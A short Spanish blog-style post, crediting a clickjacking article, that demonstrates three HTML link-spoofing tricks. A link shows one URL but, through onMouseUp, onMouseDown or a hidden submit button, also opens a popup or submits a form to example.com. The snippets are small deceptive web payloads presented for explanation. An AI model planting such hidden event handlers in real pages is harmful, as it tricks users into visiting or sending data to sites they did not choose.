Vulnerabilidad en el evento onMouseUp:

<a onMouseUp=window.open("http://www.example.com")
href="http://www.edgaragg.com/">Vínculo Falso</a>

Cuándo colocas el puntero del ratón sobre el vínculo podrás ver en la barra de estado que el vínculo apunta a EdgarAGG.com. Sin embargo, al hacer clic sobre el vínculo también se abrirá una ventana emergente con la página www.example.com.

Vulnerabilidad en los Formulario

<form name="formulario_uno" action="http://www.example.com">
</form>
<a href="http://www.edgaragg.com"
onMouseDown=document.formulario_uno.submit()>Vínculo falso</a>

Vínculo falso

En este caso, cuando haces clic en el vínculo, estás enviando también el formulario, los navegadores tienden a capturar primero el evento de clic del ratón, pero esto depende de la velocidad en que el usuario suelta el botón del ratón. Algunas veces se cargará primero la página de destino antes que la página false, otras veces, la página real nunca se cargará Depende de la velocidad con la que el usuario hace clic con el ratón.

Vulnerabilidad en el Submit

<form name="formulario_dos" action=""
onSubmit=window.open("http://www.example.com")>
<input type="submit" id="submit_dos"
style="position:absolute;left:0px;visibility:hidden;"/>
<a href="http://www.edgaragg.com"
onMouseUp=document.getElementById('submit_dos').click()>Vínculo falso</a>
</form>

Esta es una forma más fiable de abrir una ventana emergente usando un formulario. En Firefox se abre la ventana sin problemas, en Internet Explorer no se muestra la página objetivo (EdgarAGG.com) solo la ventana falsa.

Fuente: http://www.breakingpointsystems.com/community/blog/clickjacking